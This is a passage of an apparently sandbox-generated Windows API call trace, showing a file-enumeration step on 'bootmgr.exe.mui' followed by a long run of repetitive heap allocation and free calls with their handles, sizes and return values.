cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.067] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.067] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.068] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 